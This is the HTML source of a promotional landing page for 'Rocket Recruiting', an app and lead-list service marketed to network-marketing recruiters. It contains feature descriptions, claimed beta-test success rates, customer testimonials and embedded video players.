data-image-id="id^5012|url^http://rocketrecruitingapp.com/rrlanderrebuild/wp-content/uploads/2013/05/rr-large-header-image2.jpg|caption^null|alt^null|title^rr-large-header-image2|description^null" data-ultimate-bg-style="vcpb-default" data-bg-img-repeat="no-repeat" data-bg-img-size="cover" data-bg-img-position="" data-parallx_sense="30" data-bg-override="0" data-bg_img_attach="scroll" data-upb-overlay-color="rgba(0,0,0,0.2)" data-upb-bg-animation="" data-fadeout="" data-bg-animation="left-animation" data-bg-animation-type="h" data-animation-repeat="repeat" data-fadeout-percentage="30" data-parallax-content="" data-parallax-content-sense="30" data-row-effect-mobile-disable="true" data-img-parallax-mobile-disable="true" data-rtl="false" data-custom-vc-row="" data-vc="4.12" data-is_old_vc="" data-theme-support="" data-overlay="true" data-overlay-color="rgba(0,0,0,0.2)" data-overlay-pattern="" data-overlay-pattern-opacity="0.8" data-overlay-pattern-size="" data-overlay-pattern-attachment="scroll" data-seperator="true" data-seperator-type="xlarge_triangle_seperator" data-seperator-shape-size="40" data-seperator-svg-height="60" data-seperator-full-width="true" data-seperator-position="bottom_seperator" data-seperator-background-color="#fff" data-icon="&lt;div class=&quot;ult-just-icon-wrapper &quot;&gt;&lt;div class=&quot;align-icon&quot; style=&quot;text-align:center;&quot;&gt; &lt;div class=&quot;aio-icon none &quot; style=&quot;color:#dd3333;font-size:32px;display:inline-block;&quot;&gt; &lt;i class=&quot;Defaults-arrow-circle-down&quot;&gt;&lt;/i&gt; &lt;/div&gt;&lt;/div&gt;&lt;/div&gt;" ></div><section class="l-section wpb_row height_medium"><div class="l-section-h i-cf"><div class="g-cols offset_small"><div class="vc_col-sm-12 wpb_column"><div class="vc_column-inner"><div class="w-logos style_3 nav_arrows type_carousel cols_5"><div class="w-logos-list" data-items="5" data-autoplay="1" data-timeout="3000" data-nav="1"><div class="w-logos-item"><img width="200" height="100" src="http://rocketrecruitingapp.com/wp-content/uploads/2013/05/abc.png" class="attachment-medium size-medium" alt="" /></div><div class="w-logos-item"><img width="200" height="100" src="http://rocketrecruitingapp.com/wp-content/uploads/2013/05/cbs.png" class="attachment-medium size-medium" alt="" /></div><div class="w-logos-item"><img width="200" height="100" src="http://rocketrecruitingapp.com/wp-content/uploads/2013/05/espn.png" class="attachment-medium size-medium" alt="" /></div><div class="w-logos-item"><img width="200" height="100" src="http://rocketrecruitingapp.com/wp-content/uploads/2013/05/forbes.png" class="attachment-medium size-medium" alt="" /></div><div class="w-logos-item"><img width="200" height="100" src="http://rocketrecruitingapp.com/wp-content/uploads/2013/05/foxbusiness.png" class="attachment-medium size-medium" alt="" /></div><div class="w-logos-item"><img width="200" height="100" src="http://rocketrecruitingapp.com/wp-content/uploads/2013/05/nbc.png" class="attachment-medium size-medium" alt="" /></div><div class="w-logos-item"><img width="200" height="100" src="http://rocketrecruitingapp.com/wp-content/uploads/2013/05/nytimes.png" class="attachment-medium size-medium" alt="" /></div><div class="w-logos-item"><img width="200" height="100" src="http://rocketrecruitingapp.com/wp-content/uploads/2013/05/redbook.png" class="attachment-medium size-medium" alt="" /></div><div class="w-logos-item"><img width="200" height="100" src="http://rocketrecruitingapp.com/wp-content/uploads/2013/05/usa_today.png" class="attachment-medium size-medium" alt="" /></div><div class="w-logos-item"><img width="200" height="100" src="http://rocketrecruitingapp.com/wp-content/uploads/2013/05/wallstjournal.png" class="attachment-medium size-medium" alt="" /></div></div></div></div></div></div></div></section><section class="l-section wpb_row height_auto" id="services"><div class="l-section-h i-cf"><div class="g-cols offset_small"><div class="vc_col-sm-12 wpb_column"><div class="vc_column-inner"><div class="wpb_text_column "><div class="wpb_wrapper"> <h2 style="text-align: center;"><span style="color: #000000;">BECOME A TOP RECRUITER WITH ZERO REJECTION BY<br /> GETTING PROSPECTS TO ASK YOU ABOUT YOUR BUSINESS</span></h2> </div> </div> </div></div></div></div></section><section class="l-section wpb_row height_medium"><div class="l-section-h i-cf"><div class="g-cols offset_small"><div class="vc_col-sm-4 wpb_column"><div class="vc_column-inner"><div class="w-iconbox iconpos_top size_large style_outlined color_primary"><div class="w-iconbox-icon"><i class="fa fa-puzzle-piece"></i></div><h4 class="w-iconbox-title">NEVER STRUGGLE SELLING OR CONVINCING AGAIN</h4><div class="w-iconbox-text">Always Be in a Position of Power and Have Prospects Practically Beg You to Join Your Business</div></div></div></div><div class="vc_col-sm-4 wpb_column"><div class="vc_column-inner"><div class="w-iconbox iconpos_top size_large style_outlined color_primary"><div class="w-iconbox-icon"><i class="fa fa-money"></i></div><h4 class="w-iconbox-title">OVERCOME THE MONEY OBSTACLE, INSTANTLY!</h4><div class="w-iconbox-text">Quickly Show Your Prospect How Much Money They Are LOSING Each Month By Not Owning a Home Business Like Yours</div></div></div></div><div class="vc_col-sm-4 wpb_column"><div class="vc_column-inner"><div class="w-iconbox iconpos_top size_large style_outlined color_primary"><div class="w-iconbox-icon"><i class="fa fa-rocket"></i></div><h4 class="w-iconbox-title">FEARLESSLY APPROACH ANYONE, ANYTIME, ANYWHERE!</h4><div class="w-iconbox-text">Open The Door With Any Prospect in a Rejection-Free, Resistance-Free Way by Leading With A Giving Hand</div></div></div></div></div></div></section><section class="l-section wpb_row height_small color_primary" id="whyus" style="padding-bottom: 30px !important;"><div class="l-section-h i-cf"><div class="g-cols offset_small"><div class="vc_col-sm-6 wpb_column animate_hfc d1"><div class="vc_column-inner"><div class="w-image align_center animate_afl"><img width="600" height="600" src="http://rocketrecruitingapp.com/wp-content/uploads/2013/05/mag_covers-sized.png" class="attachment-full size-full" alt="" srcset="http://rocketrecruitingapp.com/wp-content/uploads/2013/05/mag_covers-sized.png 600w, http://rocketrecruitingapp.com/wp-content/uploads/2013/05/mag_covers-sized-150x150.png 150w, http://rocketrecruitingapp.com/wp-content/uploads/2013/05/mag_covers-sized-300x300.png 300w, http://rocketrecruitingapp.com/wp-content/uploads/2013/05/mag_covers-sized-350x350.png 350w" sizes="(max-width: 600px) 100vw, 600px" /></div><div class="w-separator type_invisible size_medium thick_1 style_solid color_border cont_none"><span class="w-separator-h"></span></div></div></div><div class="vc_col-sm-6 wpb_column animate_afb"><div class="vc_column-inner"><div class="w-separator type_invisible size_medium thick_1 style_solid color_border cont_none"><span class="w-separator-h"></span></div><div class="wpb_text_column "><div class="wpb_wrapper"> <h1 style="text-align: center;">WE LET RESULTS SPEAK</h1> <p>We beta tested the Rocket Recruiting System with 312 Network Marketing professionals in all different niches.</p> <ul class="fa-ul"> <li> <h4><i class="fa-li fa fa-check-square fa-lg"></i>93% Signed Up 1 New Person Into Their Business Within 7 Days</h4> </li> <li> <h4><i class="fa-li fa fa-check-square fa-lg"></i>23% Signed Up 1 New Person Into Their Business Within 24 Hours</h4> </li> <li> <h4><i class="fa-li fa fa-check-square fa-lg"></i>97% Said Rocket Recruiting Easily Overcomes “The Money Obstacle&#8221;</h4> </li> <li> <h4><i class="fa-li fa fa-check-square fa-lg"></i>95% Believe Rocket Recruiting Will Increase Team Building &amp; Duplication</h4> </li> </ul> </div> </div> <div class="w-btn-wrapper align_center"><a class="w-btn style_solid color_secondary icon_none" href="https://erictippetts.clickfunnels.com/auto-webinar-registration-winnertolqmv97" target="_blank" style="font-size: 24px;"><span class="w-btn-label">WATCH THE WEBINAR NOW</span></a></div><div class="w-separator type_invisible size_medium thick_1 style_solid color_border cont_none"><span class="w-separator-h"></span></div></div></div></div></div></section><!-- Row Backgrounds --><div class="upb_color" data-bg-override="0" data-bg-color="#ff0000" data-fadeout="" data-fadeout-percentage="30" data-parallax-content="" data-parallax-content-sense="30" data-row-effect-mobile-disable="true" data-img-parallax-mobile-disable="true" data-rtl="false" data-custom-vc-row="" data-vc="4.12" data-is_old_vc="" data-theme-support="" data-overlay="false" data-overlay-color="" data-overlay-pattern="" data-overlay-pattern-opacity="" data-overlay-pattern-size="" data-seperator="true" data-seperator-type="xlarge_triangle_seperator" data-seperator-shape-size="40" data-seperator-svg-height="60" data-seperator-full-width="true" data-seperator-position="bottom_seperator" data-seperator-background-color="#000000" data-icon="" ></div><section class="l-section wpb_row height_medium color_secondary" id="features"><div class="l-section-h i-cf"><div class="g-cols offset_small"><div class="vc_col-sm-3 wpb_column animate_afc"><div class="vc_column-inner"><div class="w-counter size_medium color_custom" data-initial="0" data-target="93" data-prefix="" data-suffix="%"> <div class="w-counter-h"> <div class="w-counter-number" style="color: #ff0000"> 0% </div> <h6 class="w-counter-title">1 New Sign-Up in 7 Days</h6> </div> </div> </div></div><div class="vc_col-sm-3 wpb_column animate_afc d1"><div class="vc_column-inner"><div class="w-counter size_medium color_text" data-initial="0" data-target="23" data-prefix="" data-suffix="%"> <div class="w-counter-h"> <div class="w-counter-number"> 0% </div> <h6 class="w-counter-title">1 New Sign-Up in 24 Hours</h6> </div> </div> </div></div><div class="vc_col-sm-3 wpb_column animate_afc d2"><div class="vc_column-inner"><div class="w-counter size_medium color_text" data-initial="0" data-target="97" data-prefix="" data-suffix="%"> <div class="w-counter-h"> <div class="w-counter-number"> 0% </div> <h6 class="w-counter-title">Success on ``Money Obstacle``</h6> </div> </div> </div></div><div class="vc_col-sm-3 wpb_column animate_afc d3"><div class="vc_column-inner"><div class="w-counter size_medium color_custom" data-initial="0" data-target="95" data-prefix="" data-suffix="%"> <div class="w-counter-h"> <div class="w-counter-number" style="color: #ff0000"> 0% </div> <h6 class="w-counter-title">Success Rate</h6> </div> </div> </div></div></div></div></section><section class="l-section wpb_row height_large"><div class="l-section-h i-cf"><div class="g-cols offset_small"><div class="vc_col-sm-12 wpb_column"><div class="vc_column-inner"><div class="wpb_text_column "><div class="wpb_wrapper"> <h1 class="dark-text" style="text-align: center;"><span style="text-decoration: underline;"><span style="color: #000000; text-decoration: underline;">AMAZINGLY SIMPLE</span></span></h1> </div> </div> <div class="w-separator type_short size_medium thick_1 style_solid color_primary cont_icon"><span class="w-separator-h"><i class="fa fa-chevron-down"></i></span></div><div class="g-cols wpb_row offset_small vc_inner "><div class="vc_col-sm-4 wpb_column"><div class="vc_column-inner"><div class="w-iconbox iconpos_left size_medium style_default color_primary"><div class="w-iconbox-icon"><i class="fa fa-check-circle-o"></i></div><h4 class="w-iconbox-title">SIMPLE DASHBOARD</h4><div class="w-iconbox-text">Make managing your Network Marketing business a snap with this quick and easy dashboard.</p> </div></div><div class="w-separator type_invisible size_medium thick_1 style_solid color_border cont_none"><span class="w-separator-h"></span></div><div class="w-iconbox iconpos_left size_medium style_default color_primary"><div class="w-iconbox-icon"><i class="fa fa-check-circle-o"></i></div><h4 class="w-iconbox-title">RECRUITING VIDEOS</h4><div class="w-iconbox-text">Our built-in, shareable videos will do the prospecting, presenting, and closing for you</div></div><div class="w-separator type_invisible size_medium thick_1 style_solid color_border cont_none"><span class="w-separator-h"></span></div><div class="w-iconbox iconpos_left size_medium style_default color_primary"><div class="w-iconbox-icon"><i class="fa fa-check-circle-o"></i></div><h4 class="w-iconbox-title">ACCOUNTABILITY ACTION CHECKER</h4><div class="w-iconbox-text">We created a “5 Actions a Day” tracking &amp; accountability system to help you grow your income.</div></div></div></div><div class="vc_col-sm-4 wpb_column"><div class="vc_column-inner"><div class="w-image align_center animate_afc"><img width="238" height="500" src="http://rocketrecruitingapp.com/wp-content/uploads/2013/05/single-iphone3.png" class="attachment-full size-full" alt="" srcset="http://rocketrecruitingapp.com/wp-content/uploads/2013/05/single-iphone3.png 238w, http://rocketrecruitingapp.com/wp-content/uploads/2013/05/single-iphone3-143x300.png 143w" sizes="(max-width: 238px) 100vw, 238px" /></div></div></div><div class="vc_col-sm-4 wpb_column"><div class="vc_column-inner"><div class="w-iconbox iconpos_left size_medium style_default color_primary"><div class="w-iconbox-icon"><i class="fa fa-check-circle-o"></i></div><h4 class="w-iconbox-title">TOP EARNER TRAINING</h4><div class="w-iconbox-text">Cold/warm prospecting, objection handling, team building &amp; more delivered by Top Earners.</div></div><div class="w-separator type_invisible size_medium thick_1 style_solid color_border cont_none"><span class="w-separator-h"></span></div><div class="w-iconbox iconpos_left size_medium style_default color_primary"><div class="w-iconbox-icon"><i class="fa fa-check-circle-o"></i></div><h4 class="w-iconbox-title">DONE-FOR-YOU SALES FUNNELS</h4><div class="w-iconbox-text">Giving you a 1-click feature that makes sharing, capturing leads &amp; recruiting online a snap.</div></div><div class="w-separator type_invisible size_medium thick_1 style_solid color_border cont_none"><span class="w-separator-h"></span></div><div class="w-iconbox iconpos_left size_medium style_default color_primary"><div class="w-iconbox-icon"><i class="fa fa-check-circle-o"></i></div><h4 class="w-iconbox-title">LEAD MANAGEMENT &amp; FOLLOW UP SYSTEM</h4><div class="w-iconbox-text">Capture, manage, and follow up on leads automatically to duplicate your team faster &amp; with less hassle.</div></div></div></div></div><div class="w-separator type_short size_medium thick_1 style_solid color_primary cont_icon"><span class="w-separator-h"><i class="fa fa-chevron-down"></i></span></div><div class="w-btn-wrapper align_center"><a class="w-btn style_solid color_primary icon_none" href="https://erictippetts.clickfunnels.com/auto-webinar-registration-winnertolqmv97" target="_blank" style="font-size: 24px;"><span class="w-btn-label">WATCH THE WEBINAR NOW</span></a></div></div></div></div></div></section><section class="l-section wpb_row height_small" id="webinars"><div class="l-section-h i-cf"><div class="g-cols offset_small"><div class="vc_col-sm-6 wpb_column animate_afl d1"><div class="vc_column-inner"><div class="w-image animate_afl"><img width="640" height="400" src="http://rocketrecruitingapp.com/wp-content/uploads/2013/05/under_the_hood_section3.png" class="attachment-full size-full" alt="" srcset="http://rocketrecruitingapp.com/wp-content/uploads/2013/05/under_the_hood_section3.png 640w, http://rocketrecruitingapp.com/wp-content/uploads/2013/05/under_the_hood_section3-300x188.png 300w, http://rocketrecruitingapp.com/wp-content/uploads/2013/05/under_the_hood_section3-600x375.png 600w" sizes="(max-width: 640px) 100vw, 640px" /></div></div></div><div class="vc_col-sm-6 wpb_column animate_afr"><div class="vc_column-inner"><div class="wpb_text_column "><div class="wpb_wrapper"> <div align="center"><iframe src="https://www.youtube.com/embed/N2BkHh8ua_o?rel=0&amp;showinfo=0" width="560" height="315" frameborder="0" allowfullscreen="allowfullscreen"></iframe></div> </div> </div> </div></div></div></div></section><section class="l-section wpb_row height_auto color_primary"><div class="l-section-h i-cf"><div class="g-cols offset_small"><div class="vc_col-sm-12 wpb_column"><div class="vc_column-inner"><div class="w-separator type_invisible size_small thick_1 style_solid color_border cont_none"><span class="w-separator-h"></span></div><div class="wpb_text_column "><div class="wpb_wrapper"> <h1 style="text-align: center;">ALSO&#8230;.INTRODUCING ROCKET RECRUITING LEADS!</h1> </div> </div> <div class="w-separator type_short size_small thick_1 style_solid color_custom cont_none" style="border-color: #ffffff; color: #ffffff;"><span class="w-separator-h"></span></div></div></div></div></div></section><section class="l-section wpb_row height_small color_primary" style="padding-bottom: 30px !important;"><div class="l-section-h i-cf"><div class="g-cols offset_small"><div class="vc_col-sm-6 wpb_column animate_hfc d1"><div class="vc_column-inner"><div class="w-image align_center animate_afl"><img width="669" height="900" src="http://rocketrecruitingapp.com/wp-content/uploads/2018/01/3DRocket_Recruiting_Leads-sized.png" class="attachment-full size-full" alt="" srcset="http://rocketrecruitingapp.com/wp-content/uploads/2018/01/3DRocket_Recruiting_Leads-sized.png 669w, http://rocketrecruitingapp.com/wp-content/uploads/2018/01/3DRocket_Recruiting_Leads-sized-223x300.png 223w, http://rocketrecruitingapp.com/wp-content/uploads/2018/01/3DRocket_Recruiting_Leads-sized-600x807.png 600w" sizes="(max-width: 669px) 100vw, 669px" /></div><div class="w-separator type_invisible size_small thick_1 style_solid color_border cont_none"><span class="w-separator-h"></span></div></div></div><div class="vc_col-sm-6 wpb_column animate_afb"><div class="vc_column-inner"><div class="wpb_text_column "><div class="wpb_wrapper"> <h2 style="text-align: center;">WHAT COMES WITH THESE LEADS</h2> <ul class="fa-ul"> <li> <h4><i class="fa-li fa fa-check-square fa-lg"></i>First and Last Name</h4> </li> <li> <h4><i class="fa-li fa fa-check-square fa-lg"></i>Email address</h4> </li> <li> <h4><i class="fa-li fa fa-check-square fa-lg"></i>Telephone Number</h4> </li> <li> <h4><i class="fa-li fa fa-check-square fa-lg"></i>Agent they spoke with (very important)</h4> </li> <li> <h4><i class="fa-li fa fa-check-square fa-lg"></i>How much extra money would they like to make monthly?</h4> </li> <li> <h4><i class="fa-li fa fa-check-square fa-lg"></i>How much time can they spend each week on a new business if they decide to start?</h4> </li> <li> <h4><i class="fa-li fa fa-check-square fa-lg"></i>If you found the right business would you invest at least $100 to get started</h4> </li> <li> <h4><i class="fa-li fa fa-check-square fa-lg"></i>Gender</h4> </li> <li> <h4><i class="fa-li fa fa-check-square fa-lg"></i>Best time to call them</h4> </li> </ul> </div> </div> <div class="w-btn-wrapper align_center"><a class="w-btn style_solid color_secondary icon_none" href="https://rocketrecruitingleads.com" target="_blank" style="font-size: 24px;"><span class="w-btn-label">LEARN MORE CLICK HERE!</span></a></div><div class="w-separator type_invisible size_small thick_1 style_solid color_border cont_none"><span class="w-separator-h"></span></div></div></div></div></div></section><!-- Row Backgrounds --><div class="upb_color" data-bg-override="0" data-bg-color="#ff0000" data-fadeout="" data-fadeout-percentage="30" data-parallax-content="" data-parallax-content-sense="30" data-row-effect-mobile-disable="true" data-img-parallax-mobile-disable="true" data-rtl="false" data-custom-vc-row="" data-vc="4.12" data-is_old_vc="" data-theme-support="" data-overlay="false" data-overlay-color="" data-overlay-pattern="" data-overlay-pattern-opacity="" data-overlay-pattern-size="" ></div><section class="l-section wpb_row height_medium"><div class="l-section-h i-cf"><div class="g-cols offset_small"><div class="vc_col-sm-12 wpb_column animate_afl d1"><div class="vc_column-inner"><div class="wpb_text_column "><div class="wpb_wrapper"> <h2 style="text-align: center;"><span style="color: #ff0000;">50+ NEW TEAM MEMBERS IN HIS FIRST 30 DAYS</span></h2> </div> </div> <div class="g-cols wpb_row offset_small vc_inner "><div class="vc_col-sm-6 wpb_column"><div class="vc_column-inner"><div class="wpb_text_column "><div class="wpb_wrapper"> <div align="center"><iframe src="https://www.youtube.com/embed/vSbqm8ehw3k?rel=0" width="560" height="315" frameborder="0" allowfullscreen="allowfullscreen"></iframe></div> </div> </div> </div></div><div class="vc_col-sm-6 wpb_column"><div class="vc_column-inner"><div class="wpb_text_column "><div class="wpb_wrapper"><strong>Super Star:</strong> Oberlin Fonseca Jr.<br /> <strong>MLM Company:</strong> Volishon</p> <p><strong>Rocket Recruiting Success Story:</strong></p> <p>“We launched a new team on October 1st  2016 . We approached it using your AMAZING system , in our first 24 hours we hit the company fast start bonus of $1,200.00 , and in our first 30 days have built an organization of +50 new business partners and are well on our way to hitting the 100 mark in our organization ! THANK YOU FOR THIS AMAZING TOOL !!!&#8221;</div> </div> </div></div></div></div></div></div></div></section><section class="l-section wpb_row height_medium" id="screenshots"><div class="l-section-h i-cf"><div class="g-cols offset_small"><div class="vc_col-sm-12 wpb_column"><div class="vc_column-inner"><div class="wpb_text_column "><div class="wpb_wrapper"> <h1 style="text-align: center;"><span style="text-decoration: underline; color: #000000;">SCREENSHOTS</span></h1> </div> </div> <div class="w-logos style_1 nav_arrows with_indents type_carousel cols_4"><div class="w-logos-list" data-items="4" data-autoplay="1" data-timeout="3000" data-nav="1"><div class="w-logos-item"><img width="157" height="300" src="http://rocketrecruitingapp.com/wp-content/uploads/2013/05/affiliate_program-157x300.png" class="attachment-medium size-medium" alt="" srcset="http://rocketrecruitingapp.com/wp-content/uploads/2013/05/affiliate_program-157x300.png 157w, http://rocketrecruitingapp.com/wp-content/uploads/2013/05/affiliate_program.png 433w" sizes="(max-width: 157px) 100vw, 157px" /></div><div class="w-logos-item"><img width="157" height="300" src="http://rocketrecruitingapp.com/wp-content/uploads/2013/05/leads-157x300.png" class="attachment-medium size-medium" alt="" srcset="http://rocketrecruitingapp.com/wp-content/uploads/2013/05/leads-157x300.png 157w, http://rocketrecruitingapp.com/wp-content/uploads/2013/05/leads.png 433w" sizes="(max-width: 157px) 100vw, 157px" /></div><div class="w-logos-item"><img width="157" height="300" src="http://rocketrecruitingapp.com/wp-content/uploads/2013/05/share_a_video-157x300.png" class="attachment-medium size-medium" alt="" srcset="http://rocketrecruitingapp.com/wp-content/uploads/2013/05/share_a_video-157x300.png 157w, http://rocketrecruitingapp.com/wp-content/uploads/2013/05/share_a_video.png 432w" sizes="(max-width: 157px) 100vw, 157px" /></div><div class="w-logos-item"><img width="158" height="300" src="http://rocketrecruitingapp.com/wp-content/uploads/2013/05/tax_estimator-158x300.png" class="attachment-medium size-medium" alt="" srcset="http://rocketrecruitingapp.com/wp-content/uploads/2013/05/tax_estimator-158x300.png 158w, http://rocketrecruitingapp.com/wp-content/uploads/2013/05/tax_estimator.png 434w" sizes="(max-width: 158px) 100vw, 158px" /></div><div class="w-logos-item"><img width="158" height="300" src="http://rocketrecruitingapp.com/wp-content/uploads/2013/05/tools2-158x300.png" class="attachment-medium size-medium" alt="" srcset="http://rocketrecruitingapp.com/wp-content/uploads/2013/05/tools2-158x300.png 158w, http://rocketrecruitingapp.com/wp-content/uploads/2013/05/tools2.png 433w" sizes="(max-width: 158px) 100vw, 158px" /></div><div class="w-logos-item"><img width="158" height="300" src="http://rocketrecruitingapp.com/wp-content/uploads/2013/05/training-158x300.png" class="attachment-medium size-medium" alt="" srcset="http://rocketrecruitingapp.com/wp-content/uploads/2013/05/training-158x300.png 158w, http://rocketrecruitingapp.com/wp-content/uploads/2013/05/training.png 435w" sizes="(max-width: 158px) 100vw, 158px" /></div></div></div></div></div></div></div></section><section class="l-section wpb_row height_medium" id="feedback"><div class="l-section-h i-cf"><div class="g-cols offset_small"><div class="vc_col-sm-12 wpb_column"><div class="vc_column-inner"><div class="wpb_text_column "><div class="wpb_wrapper"><div id="testimonial_rotator_wrap_5161" class="testimonial_rotator_wrap with-prevnext "> <div id="testimonial_rotator_5161" class="testimonial_rotator hreview-aggregate cycletwo-slideshow format-rotator template-longform" data-cycletwo-timeout="5000" data-cycletwo-speed="1000" data-cycletwo-pause-on-hover="true" data-cycletwo-swipe="true" data-cycletwo-fx="fade" data-cycletwo-auto-height="calc" data-cycletwo-next="#testimonial_rotator_wrap_5161 .testimonial_rotator_next" data-cycletwo-prev="#testimonial_rotator_wrap_5161 .testimonial_rotator_prev" data-cycletwo-slides="> div.slide" data-cycletwo-log="false" > <div class="slide slide1 testimonial_rotator_slide hreview itemreviewed item has-image cf-tr"> <div class="testimonial_rotator_stars cf-tr"> <span class="testimonial_rotator_star testimonial_rotator_star_1"><i class="fa fa-star"></i></span> <span class="testimonial_rotator_star testimonial_rotator_star_2"><i class="fa fa-star"></i></span> <span class="testimonial_rotator_star testimonial_rotator_star_3"><i class="fa fa-star"></i></span> <span class="testimonial_rotator_star testimonial_rotator_star_4"><i class="fa fa-star"></i></span> <span class="testimonial_rotator_star testimonial_rotator_star_5"><i class="fa fa-star"></i></span></div> <h1 class="testimonial_rotator_slide_title">Oberlin Fonseca Jr.</h1> <div class="text testimonial_rotator_description"> <div class="testimonial_rotator_quote"> <h3><span style="color: #ffffff;">Eric, just a quick email to say thanks. We signed up 4 new people last night. I was able to show them how to get a raise on their paychecks just for signing up and working with us. All of them were well over $300 a month and that is more than what they invested to get started with us.<br /> Thank you for this AMAZING tool !!!!!</span></h3></div> <hr class="longform_hr"> <div class="testimonial_rotator_img img"><img width="150" height="150" src="http://rocketrecruitingapp.com/wp-content/uploads/2016/07/oberlin_fonseca-150x150.png" class="attachment-thumbnail size-thumbnail wp-post-image" alt="" srcset="http://rocketrecruitingapp.com/wp-content/uploads/2016/07/oberlin_fonseca-150x150.png 150w, http://rocketrecruitingapp.com/wp-content/uploads/2016/07/oberlin_fonseca.png 160w" sizes="(max-width: 150px) 100vw, 150px" /></div> <div class="testimonial_rotator_author_info cf-tr"> <p>Oberlin Fonseca Jr.</p> </div> </div> <div class="testimonial_rotator_microdata"> <div class="rating">5.0</div> <div class="dtreviewed"> 2016-07-03T05:20:10+00:00</div> <div class="reviewer"> <div class="fn"> <p>Oberlin Fonseca Jr.</p> </div><img width="150" height="150" src="http://rocketrecruitingapp.com/wp-content/uploads/2016/07/oberlin_fonseca-150x150.png" class="photo wp-post-image" alt="" srcset="http://rocketrecruitingapp.com/wp-content/uploads/2016/07/oberlin_fonseca-150x150.png 150w, http://rocketrecruitingapp.com/wp-content/uploads/2016/07/oberlin_fonseca.png 160w" sizes="(max-width: 150px) 100vw, 150px" /> </div>Eric, just a quick email to say thanks. We signed up 4 new people last night. I was able to show them how to get a raise on their paychecks just for signing up and working with us. All of them were well over $300 a month and that is more than what they invested to get started with us. Thank you for this AMAZING tool !!!!! <div class="summary"> </div> <div class="permalink"> http://rocketrecruitingapp.com/testimonials/oberlin-fonseca-jr-2/</div></div> <!-- .testimonial_rotator_microdata --> </div> <div class="slide slide2 testimonial_rotator_slide hreview itemreviewed item has-image cf-tr"> <div class="testimonial_rotator_stars cf-tr"> <span class="testimonial_rotator_star testimonial_rotator_star_1"><i class="fa fa-star"></i></span> <span class="testimonial_rotator_star testimonial_rotator_star_2"><i class="fa fa-star"></i></span> <span class="testimonial_rotator_star testimonial_rotator_star_3"><i class="fa fa-star"></i></span> <span class="testimonial_rotator_star testimonial_rotator_star_4"><i class="fa fa-star"></i></span> <span class="testimonial_rotator_star testimonial_rotator_star_5"><i class="fa fa-star"></i></span></div> <h1 class="testimonial_rotator_slide_title">Mike Tapin</h1> <div class="text testimonial_rotator_description"> <div class="testimonial_rotator_quote"> <h3><span style="color: #ffffff;">I recently sent a prospect a Gift of Health but the timing was not right for him. Using the tax savings app, I sent him a report that outlined how much he was losing each month by not having a home business.<br /> His email back to me was very frank, he was "blown away by the information" and "we need to talk"!</u></span></h3></div> <hr class="longform_hr"> <div class="testimonial_rotator_img img"><img width="150" height="150" src="http://rocketrecruitingapp.com/wp-content/uploads/2016/07/mike_tapin-150x150.png" class="attachment-thumbnail size-thumbnail wp-post-image" alt="" srcset="http://rocketrecruitingapp.com/wp-content/uploads/2016/07/mike_tapin-150x150.png 150w, http://rocketrecruitingapp.com/wp-content/uploads/2016/07/mike_tapin.png 160w" sizes="(max-width: 150px) 100vw, 150px" /></div> <div class="testimonial_rotator_author_info cf-tr"> <p>Mike Tapin</p> </div> </div> <div class="testimonial_rotator_microdata"> <div class="rating">5.0</div> <div class="dtreviewed"> 2016-07-03T05:35:01+00:00</div> <div class="reviewer"> <div class="fn"> <p>Mike Tapin</p> </div><img width="150" height="150" src="http://rocketrecruitingapp.com/wp-content/uploads/2016/07/mike_tapin-150x150.png" class="photo wp-post-image" alt="" srcset="http://rocketrecruitingapp.com/wp-content/uploads/2016/07/mike_tapin-150x150.png 150w, http://rocketrecruitingapp.com/wp-content/uploads/2016/07/mike_tapin.png 160w" sizes="(max-width: 150px) 100vw, 150px" /> </div>I recently sent a prospect a Gift of Health but the timing was not right for him. Using the tax savings app, I sent him a report that outlined how much he was losing each month by not having a home business. His email back to me was very frank, he was "blown away by the information" and "we need to talk"! <div class="summary"> </div> <div class="permalink"> http://rocketrecruitingapp.com/testimonials/mike-tapin/</div></div> <!-- .testimonial_rotator_microdata --> </div> <div class="testimonial_rotator_microdata"> <div class="rating">5</div> <div class="count">2</div> </div><!-- aggregate rating --> </div><!-- #testimonial_rotator_5161 --> <div class="testimonial_rotator_nav"> <div class="testimonial_rotator_prev"><i class="fa fa-chevron-left"></i></div> <div class="testimonial_rotator_next"><i class="fa fa-chevron-right"></i></div></div> </div><!-- .testimonial_rotator_wrap --> </div> </div> </div></div></div></div></section><!-- Row Backgrounds --><div class="upb_bg_img" data-ultimate-bg="url(http://rocketrecruitingapp.com/wp-content/uploads/2013/05/Fotolia_63096386_Subscription_Monthly_M.jpg)" data-image-id="id^5166|url^http://rocketrecruitingapp.com/rrlanderrebuild/wp-content/uploads/2013/05/Fotolia_63096386_Subscription_Monthly_M.jpg|caption^Mature Hispanic Man Using Laptop On Desk At Home|alt^null|title^Mature Hispanic Man Using Laptop On Desk At Home|description^null" data-ultimate-bg-style="vcpb-default" data-bg-img-repeat="no-repeat" data-bg-img-size="cover" data-bg-img-position="" data-parallx_sense="30" data-bg-override="0" data-bg_img_attach="scroll" data-upb-overlay-color="rgba(0,0,0,0.4)" data-upb-bg-animation="" data-fadeout="" data-bg-animation="left-animation" data-bg-animation-type="h" data-animation-repeat="repeat" data-fadeout-percentage="30" data-parallax-content="" data-parallax-content-sense="30" data-row-effect-mobile-disable="true" data-img-parallax-mobile-disable="true" data-rtl="false" data-custom-vc-row="" data-vc="4.12" data-is_old_vc="" data-theme-support="" data-overlay="true" data-overlay-color="rgba(0,0,0,0.4)" data-overlay-pattern="" data-overlay-pattern-opacity="0.8" data-overlay-pattern-size="" data-overlay-pattern-attachment="scroll" data-seperator="true" data-seperator-type="xlarge_triangle_left_seperator" data-seperator-shape-size="40" data-seperator-svg-height="60" data-seperator-full-width="true" data-seperator-position="bottom_seperator" data-seperator-background-color="#ff0000" data-icon="" ></div><section class="l-section wpb_row height_medium color_primary"><div class="l-section-h i-cf"><div class="g-cols offset_small"><div class="vc_col-sm-6 wpb_column animate_hfc d1"><div class="vc_column-inner"><div class="wpb_text_column "><div class="wpb_wrapper"> <h1 style="text-align: center;">TODD FALCONE SPEAKS..</h1> </div> </div> <div class="w-separator type_invisible size_medium thick_1 style_solid color_border cont_none"><span class="w-separator-h"></span></div> <div class="wpb_raw_code wpb_content_element wpb_raw_html"> <div class="wpb_wrapper"> <script src="//fast.wistia.com/embed/medias/dk8q5q6v6g.jsonp" async></script><script src="//fast.wistia.com/assets/external/E-v1.js" async></script><div class="wistia_responsive_padding" style="padding:56.25% 0 0 0;position:relative;"><div class="wistia_responsive_wrapper" style="height:100%;left:0;position:absolute;top:0;width:100%;"><div class="wistia_embed wistia_async_dk8q5q6v6g videoFoam=true" 